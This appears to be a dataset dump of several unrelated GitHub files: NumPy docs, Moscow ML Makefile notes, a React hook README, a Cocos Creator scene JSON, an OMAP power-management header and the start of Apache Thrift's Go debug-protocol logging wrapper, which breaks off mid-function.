text
stringlengths 2
100k
| meta
dict |
---|---|
Miscellaneous routines
**********************
.. toctree::
.. currentmodule:: numpy
Performance tuning
------------------
.. autosummary::
:toctree: generated/
setbufsize
getbufsize
Memory ranges
-------------
.. autosummary::
:toctree: generated/
shares_memory
may_share_memory
byte_bounds
Array mixins
------------
.. autosummary::
:toctree: generated/
lib.mixins.NDArrayOperatorsMixin
NumPy version comparison
------------------------
.. autosummary::
:toctree: generated/
lib.NumpyVersion
Utility
-------
.. autosummary::
:toctree: generated/
get_include
show_config
deprecate
deprecate_with_doc
Matlab-like Functions
---------------------
.. autosummary::
:toctree: generated/
who
disp | {
"pile_set_name": "Github"
} |
The Unix Makefile defines the following targets, which may be useful to hackers:
make regress - builds the libraries in ../mosmllib and runs the test-suites
in test/ ../mosmllib/test/ ../test/ (by calling make current)
using the current compiler (the one in this directory).
Useful for testing prior to boostrapping.
make promote - promote the current binaries of the linker, compiler and toplevel to ../,
backing up the supplied originals in ../*.orig
Use this prior to boostrapping the compiler, provided the runtime
is unchanged.
make revert - restore the linker, compiler and lexer originals (saved by make promote).
| {
"pile_set_name": "Github"
} |
# @rooks/use-outside-click-ref
### A hook that can track a click event outside a ref. Returns a callbackRef.
    
<a href="https://spectrum.chat/rooks"><img src="https://withspectrum.github.io/badge/badge.svg" alt="Join the community on Spectrum"/></a>
### Installation
```
npm install --save @rooks/use-outside-click-ref
```
### Importing the hook
```javascript
import useOutsideClickRef from "@rooks/use-outside-click-ref"
```
### Usage
```jsx
function Demo() {
function outsidePClick() {
alert("Clicked outside p");
}
const [ref] = useOutsideClickRef(outsidePClick);
return (
<div>
<p ref={ref}>Click outside me</p>
</div>
);
}
render(<Demo/>)
```
| {
"pile_set_name": "Github"
} |
[
{
"__type__": "cc.SceneAsset",
"_name": "",
"_objFlags": 0,
"scene": {
"__id__": 1
}
},
{
"__type__": "cc.Scene",
"_name": "",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": null,
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 2
},
{
"__id__": 11
}
],
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "8f24fd7b-5a5a-412a-9eda-801253200f07"
},
{
"__type__": "cc.Node",
"_name": "Canvas",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 1
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 960,
"height": 640
},
"_children": [
{
"__id__": 3
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 480,
"y": 320
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "88b07iG++9GSK3qDtTpsdas",
"_active": true,
"_components": [
{
"__id__": 10
}
],
"_prefab": null
},
{
"__type__": "cc.Node",
"_name": "center",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 2
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 4
},
{
"__id__": 6
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "cc249bILydDI40VyDCwf/UH",
"_active": true,
"_components": [
{
"__id__": 9
}
],
"_prefab": null
},
{
"__type__": "cc.Node",
"_name": "Title",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 3
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 200.12,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": 248
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "48067fgVzVLP6Q6Ntyx7l0B",
"_active": true,
"_components": [
{
"__id__": 5
}
],
"_prefab": null
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 4
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 40,
"_lineHeight": 40,
"_enableWrapText": true,
"_isSystemFontUsed": true,
"_N$string": "Disco 2000",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 0
},
{
"__type__": "cc.Node",
"_name": "CircleEffect",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 3
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 800,
"height": 480
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 0,
"y": -39
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "c1172F3GHdNb5JDS/IF8jaj",
"_active": true,
"_components": [
{
"__id__": 7
},
{
"__id__": 8
}
],
"_prefab": null
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 6
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "a23235d1-15db-4b95-8439-a2e005bfff91"
},
"_type": 0,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "ec0bddz0EhL45aBJr4t9QLx",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 6
},
"_enabled": true,
"glassFactor": 1,
"flagShader": "Effect72.fs.glsl",
"frag_glsl": "Effect10.fs.glsl"
},
{
"__type__": "cc.Widget",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 3
},
"_enabled": true,
"isAlignOnce": false,
"_alignFlags": 18,
"_left": 0,
"_right": 0,
"_top": 0,
"_bottom": 0,
"_isAbsLeft": true,
"_isAbsRight": true,
"_isAbsTop": true,
"_isAbsBottom": true,
"_originalWidth": 0,
"_originalHeight": 0
},
{
"__type__": "cc.Canvas",
"_name": "",
"_objFlags": 1835008,
"node": {
"__id__": 2
},
"_enabled": true,
"_designResolution": {
"__type__": "cc.Size",
"width": 960,
"height": 640
},
"_fitWidth": false,
"_fitHeight": true
},
{
"__type__": "cc.Node",
"_name": "BtnGroups",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 1
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 0,
"height": 0
},
"_children": [
{
"__id__": 12
},
{
"__id__": 20
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 480,
"y": 320
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "bedabglNy1G4694VND7MKwL",
"_active": true,
"_components": [
{
"__id__": 28
},
{
"__id__": 29
}
],
"_prefab": {
"__id__": 30
}
},
{
"__type__": "cc.Node",
"_name": "ButtonLast",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 11
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [
{
"__id__": 13
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": -364,
"y": -269
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "f48c9Pu/9NAvaVpaqnpkwZ9",
"_active": true,
"_components": [
{
"__id__": 16
},
{
"__id__": 17
}
],
"_prefab": {
"__id__": 19
}
},
{
"__type__": "cc.Node",
"_name": "Label",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 0,
"g": 0,
"b": 0,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 12
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 1.1368683772161603e-13,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "a9d07YHkrhNrqpNO1gQJ/gw",
"_active": true,
"_components": [
{
"__id__": 14
}
],
"_prefab": {
"__id__": 15
}
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 13
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 20,
"_lineHeight": 40,
"_enableWrapText": false,
"_isSystemFontUsed": true,
"_N$string": "上一个",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 1
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "3d062vcxBtIbbgesrSI+jF3"
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 12
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_type": 1,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "cc.Button",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 12
},
"_enabled": true,
"transition": 2,
"pressedColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"hoverColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"duration": 0.1,
"pressedSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"hoverSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"clickEvents": [
{
"__id__": 18
}
],
"_N$interactable": true,
"_N$normalColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$disabledColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$normalSprite": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_N$disabledSprite": {
"__uuid__": "29158224-f8dd-4661-a796-1ffab537140e"
},
"_N$target": {
"__id__": 12
}
},
{
"__type__": "cc.ClickEvent",
"target": {
"__id__": 11
},
"component": "EffectManager",
"handler": "onClickLast"
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "94c0ftqCdtOJKXlb0+30xhl"
},
{
"__type__": "cc.Node",
"_name": "ButtonNext",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 11
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [
{
"__id__": 21
}
],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 384,
"y": -269
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "605a0eqMc1GuKpGsbKnM85G",
"_active": true,
"_components": [
{
"__id__": 24
},
{
"__id__": 25
}
],
"_prefab": {
"__id__": 27
}
},
{
"__type__": "cc.Node",
"_name": "Label",
"_objFlags": 0,
"_opacity": 255,
"_color": {
"__type__": "cc.Color",
"r": 0,
"g": 0,
"b": 0,
"a": 255
},
"_cascadeOpacityEnabled": true,
"_parent": {
"__id__": 20
},
"_anchorPoint": {
"__type__": "cc.Vec2",
"x": 0.5,
"y": 0.5
},
"_contentSize": {
"__type__": "cc.Size",
"width": 100,
"height": 40
},
"_children": [],
"_rotationX": 0,
"_rotationY": 0,
"_scaleX": 1,
"_scaleY": 1,
"_position": {
"__type__": "cc.Vec2",
"x": 1.1368683772161603e-13,
"y": 0
},
"_skewX": 0,
"_skewY": 0,
"_localZOrder": 0,
"_globalZOrder": 0,
"_tag": -1,
"_opacityModifyRGB": false,
"_reorderChildDirty": false,
"_id": "c18b6w6gW1DZrWrbF9HB+jE",
"_active": true,
"_components": [
{
"__id__": 22
}
],
"_prefab": {
"__id__": 23
}
},
{
"__type__": "cc.Label",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 21
},
"_enabled": true,
"_useOriginalSize": false,
"_fontSize": 20,
"_lineHeight": 40,
"_enableWrapText": false,
"_isSystemFontUsed": true,
"_N$string": "下一个",
"_N$horizontalAlign": 1,
"_N$verticalAlign": 1,
"_N$overflow": 1
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "f5902Qirn9M/6eNkIPfz3B8"
},
{
"__type__": "cc.Sprite",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 20
},
"_enabled": true,
"_spriteFrame": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_type": 1,
"_sizeMode": 0,
"_fillType": 0,
"_fillCenter": {
"__type__": "cc.Vec2",
"x": 0,
"y": 0
},
"_fillStart": 0,
"_fillRange": 0,
"_isTrimmedMode": true,
"_srcBlendFactor": 770,
"_dstBlendFactor": 771,
"_atlas": null
},
{
"__type__": "cc.Button",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 20
},
"_enabled": true,
"transition": 2,
"pressedColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"hoverColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"duration": 0.1,
"pressedSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"hoverSprite": {
"__uuid__": "e9ec654c-97a2-4787-9325-e6a10375219a"
},
"clickEvents": [
{
"__id__": 26
}
],
"_N$interactable": true,
"_N$normalColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$disabledColor": {
"__type__": "cc.Color",
"r": 255,
"g": 255,
"b": 255,
"a": 255
},
"_N$normalSprite": {
"__uuid__": "f0048c10-f03e-4c97-b9d3-3506e1d58952"
},
"_N$disabledSprite": {
"__uuid__": "29158224-f8dd-4661-a796-1ffab537140e"
},
"_N$target": {
"__id__": 20
}
},
{
"__type__": "cc.ClickEvent",
"target": {
"__id__": 11
},
"component": "EffectManager",
"handler": "onClickNext"
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "f000a4iipBHL7L1JmA630O4"
},
{
"__type__": "10b8cNnro5N0qUG75gHt193",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 11
},
"_enabled": true,
"lastSceneName": "Effect23",
"nextSceneName": "Effect25"
},
{
"__type__": "cc.Widget",
"_name": "",
"_objFlags": 0,
"node": {
"__id__": 11
},
"_enabled": true,
"isAlignOnce": false,
"_alignFlags": 18,
"_left": 0,
"_right": 0,
"_top": 0,
"_bottom": 0,
"_isAbsLeft": true,
"_isAbsRight": true,
"_isAbsTop": true,
"_isAbsBottom": true,
"_originalWidth": 0,
"_originalHeight": 0
},
{
"__type__": "cc.PrefabInfo",
"root": {
"__id__": 11
},
"asset": {
"__uuid__": "289e5a19-adc5-41d3-b464-6bd29a64f6ae"
},
"fileId": "83bd0wxsfhOyrAxwCVmeS2q"
}
] | {
"pile_set_name": "Github"
} |
/*
* OMAP2/3 Power Management Routines
*
* Copyright (C) 2008 Nokia Corporation
* Jouni Hogander
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*/
#ifndef __ARCH_ARM_MACH_OMAP2_PM_H
#define __ARCH_ARM_MACH_OMAP2_PM_H
#include <plat/powerdomain.h>
extern u32 enable_off_mode;
extern u32 sleep_while_idle;
extern void *omap3_secure_ram_storage;
extern void omap3_pm_off_mode_enable(int);
extern void omap_sram_idle(void);
extern int omap3_can_sleep(void);
extern int set_pwrdm_state(struct powerdomain *pwrdm, u32 state);
extern int omap3_idle_init(void);
struct cpuidle_params {
u8 valid;
u32 sleep_latency;
u32 wake_latency;
u32 threshold;
};
#if defined(CONFIG_PM) && defined(CONFIG_CPU_IDLE)
extern void omap3_pm_init_cpuidle(struct cpuidle_params *cpuidle_board_params);
#else
static
inline void omap3_pm_init_cpuidle(struct cpuidle_params *cpuidle_board_params)
{
}
#endif
extern int omap3_pm_get_suspend_state(struct powerdomain *pwrdm);
extern int omap3_pm_set_suspend_state(struct powerdomain *pwrdm, int state);
extern u32 wakeup_timer_seconds;
extern u32 wakeup_timer_milliseconds;
extern struct omap_dm_timer *gptimer_wakeup;
#ifdef CONFIG_PM_DEBUG
extern void omap2_pm_dump(int mode, int resume, unsigned int us);
extern int omap2_pm_debug;
#else
#define omap2_pm_dump(mode, resume, us) do {} while (0);
#define omap2_pm_debug 0
#endif
#if defined(CONFIG_CPU_IDLE)
extern void omap3_cpuidle_update_states(void);
#endif
#if defined(CONFIG_PM_DEBUG) && defined(CONFIG_DEBUG_FS)
extern void pm_dbg_update_time(struct powerdomain *pwrdm, int prev);
extern int pm_dbg_regset_save(int reg_set);
extern int pm_dbg_regset_init(int reg_set);
#else
#define pm_dbg_update_time(pwrdm, prev) do {} while (0);
#define pm_dbg_regset_save(reg_set) do {} while (0);
#define pm_dbg_regset_init(reg_set) do {} while (0);
#endif /* CONFIG_PM_DEBUG */
extern void omap24xx_idle_loop_suspend(void);
extern void omap24xx_cpu_suspend(u32 dll_ctrl, void __iomem *sdrc_dlla_ctrl,
void __iomem *sdrc_power);
extern void omap34xx_cpu_suspend(u32 *addr, int save_state);
extern void save_secure_ram_context(u32 *addr);
extern void omap3_save_scratchpad_contents(void);
extern unsigned int omap24xx_idle_loop_suspend_sz;
extern unsigned int omap34xx_suspend_sz;
extern unsigned int save_secure_ram_context_sz;
extern unsigned int omap24xx_cpu_suspend_sz;
extern unsigned int omap34xx_cpu_suspend_sz;
#endif
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package thrift
import (
"log"
)
type TDebugProtocol struct {
Delegate TProtocol
LogPrefix string
}
type TDebugProtocolFactory struct {
Underlying TProtocolFactory
LogPrefix string
}
func NewTDebugProtocolFactory(underlying TProtocolFactory, logPrefix string) *TDebugProtocolFactory {
return &TDebugProtocolFactory{
Underlying: underlying,
LogPrefix: logPrefix,
}
}
func (t *TDebugProtocolFactory) GetProtocol(trans TTransport) TProtocol {
return &TDebugProtocol{
Delegate: t.Underlying.GetProtocol(trans),
LogPrefix: t.LogPrefix,
}
}
func (tdp *TDebugProtocol) WriteMessageBegin(name string, typeId TMessageType, seqid int32) error {
err := tdp.Delegate.WriteMessageBegin(name, typeId, seqid)
log.Printf("%sWriteMessageBegin(name=%#v, typeId=%#v, seqid=%#v) => %#v", tdp.LogPrefix, name, typeId, seqid, err)
return err
}
func (tdp *TDebugProtocol) WriteMessageEnd() error {
err := tdp.Delegate.WriteMessageEnd()
log.Printf("%sWriteMessageEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteStructBegin(name string) error {
err := tdp.Delegate.WriteStructBegin(name)
log.Printf("%sWriteStructBegin(name=%#v) => %#v", tdp.LogPrefix, name, err)
return err
}
func (tdp *TDebugProtocol) WriteStructEnd() error {
err := tdp.Delegate.WriteStructEnd()
log.Printf("%sWriteStructEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldBegin(name string, typeId TType, id int16) error {
err := tdp.Delegate.WriteFieldBegin(name, typeId, id)
log.Printf("%sWriteFieldBegin(name=%#v, typeId=%#v, id%#v) => %#v", tdp.LogPrefix, name, typeId, id, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldEnd() error {
err := tdp.Delegate.WriteFieldEnd()
log.Printf("%sWriteFieldEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteFieldStop() error {
err := tdp.Delegate.WriteFieldStop()
log.Printf("%sWriteFieldStop() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteMapBegin(keyType TType, valueType TType, size int) error {
err := tdp.Delegate.WriteMapBegin(keyType, valueType, size)
log.Printf("%sWriteMapBegin(keyType=%#v, valueType=%#v, size=%#v) => %#v", tdp.LogPrefix, keyType, valueType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteMapEnd() error {
err := tdp.Delegate.WriteMapEnd()
log.Printf("%sWriteMapEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteListBegin(elemType TType, size int) error {
err := tdp.Delegate.WriteListBegin(elemType, size)
log.Printf("%sWriteListBegin(elemType=%#v, size=%#v) => %#v", tdp.LogPrefix, elemType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteListEnd() error {
err := tdp.Delegate.WriteListEnd()
log.Printf("%sWriteListEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteSetBegin(elemType TType, size int) error {
err := tdp.Delegate.WriteSetBegin(elemType, size)
log.Printf("%sWriteSetBegin(elemType=%#v, size=%#v) => %#v", tdp.LogPrefix, elemType, size, err)
return err
}
func (tdp *TDebugProtocol) WriteSetEnd() error {
err := tdp.Delegate.WriteSetEnd()
log.Printf("%sWriteSetEnd() => %#v", tdp.LogPrefix, err)
return err
}
func (tdp *TDebugProtocol) WriteBool(value bool) error {
err := tdp.Delegate.WriteBool(value)
log.Printf("%sWriteBool(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteByte(value byte) error {
err := tdp.Delegate.WriteByte(value)
log.Printf("%sWriteByte(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI16(value int16) error {
err := tdp.Delegate.WriteI16(value)
log.Printf("%sWriteI16(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI32(value int32) error {
err := tdp.Delegate.WriteI32(value)
log.Printf("%sWriteI32(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteI64(value int64) error {
err := tdp.Delegate.WriteI64(value)
log.Printf("%sWriteI64(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteDouble(value float64) error {
err := tdp.Delegate.WriteDouble(value)
log.Printf("%sWriteDouble(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteString(value string) error {
err := tdp.Delegate.WriteString(value)
log.Printf("%sWriteString(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) WriteBinary(value []byte) error {
err := tdp.Delegate.WriteBinary(value)
log.Printf("%sWriteBinary(value=%#v) => %#v", tdp.LogPrefix, value, err)
return err
}
func (tdp *TDebugProtocol) ReadMessageBegin() (name string, typeId TMessageType, seqid int32, err error) {
name, typeId, seqid, err = tdp.Delegate.ReadMessageBegin()
log.Printf("%sReadMessageBegin() (name=%#v, typeId=%#v, seqid=%#v, err=%#v)", tdp.LogPrefix, name, typeId, seqid, err)
return
}
func (tdp *TDebugProtocol) ReadMessageEnd() (err error) {
err = tdp.Delegate.ReadMessageEnd()
log.Printf("%sReadMessageEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadStructBegin() (name string, err error) {
name, err = tdp.Delegate.ReadStructBegin()
log.Printf("%sReadStructBegin() (name%#v, err=%#v)", tdp.LogPrefix, name, err)
return
}
func (tdp *TDebugProtocol) ReadStructEnd() (err error) {
err = tdp.Delegate.ReadStructEnd()
log.Printf("%sReadStructEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadFieldBegin() (name string, typeId TType, id int16, err error) {
name, typeId, id, err = tdp.Delegate.ReadFieldBegin()
log.Printf("%sReadFieldBegin() (name=%#v, typeId=%#v, id=%#v, err=%#v)", tdp.LogPrefix, name, typeId, id, err)
return
}
func (tdp *TDebugProtocol) ReadFieldEnd() (err error) {
err = tdp.Delegate.ReadFieldEnd()
log.Printf("%sReadFieldEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadMapBegin() (keyType TType, valueType TType, size int, err error) {
keyType, valueType, size, err = tdp.Delegate.ReadMapBegin()
log.Printf("%sReadMapBegin() (keyType=%#v, valueType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, keyType, valueType, size, err)
return
}
func (tdp *TDebugProtocol) ReadMapEnd() (err error) {
err = tdp.Delegate.ReadMapEnd()
log.Printf("%sReadMapEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadListBegin() (elemType TType, size int, err error) {
elemType, size, err = tdp.Delegate.ReadListBegin()
log.Printf("%sReadListBegin() (elemType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, elemType, size, err)
return
}
func (tdp *TDebugProtocol) ReadListEnd() (err error) {
err = tdp.Delegate.ReadListEnd()
log.Printf("%sReadListEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadSetBegin() (elemType TType, size int, err error) {
elemType, size, err = tdp.Delegate.ReadSetBegin()
log.Printf("%sReadSetBegin() (elemType=%#v, size=%#v, err=%#v)", tdp.LogPrefix, elemType, size, err)
return
}
func (tdp *TDebugProtocol) ReadSetEnd() (err error) {
err = tdp.Delegate.ReadSetEnd()
log.Printf("%sReadSetEnd() err=%#v", tdp.LogPrefix, err)
return
}
func (tdp *TDebugProtocol) ReadBool() (value bool, err error) {
value, err = tdp.Delegate.ReadBool()
log.Printf("%sReadBool() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadByte() (value byte, err error) {
value, err = tdp.Delegate.ReadByte()
log.Printf("%sReadByte() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI16() (value int16, err error) {
value, err = tdp.Delegate.ReadI16()
log.Printf("%sReadI16() (value=%#v, err=%#v)", tdp.LogPrefix, value, err)
return
}
func (tdp *TDebugProtocol) ReadI32() (value int32, err error) {
value, err = tdp.Delegate.ReadI32()
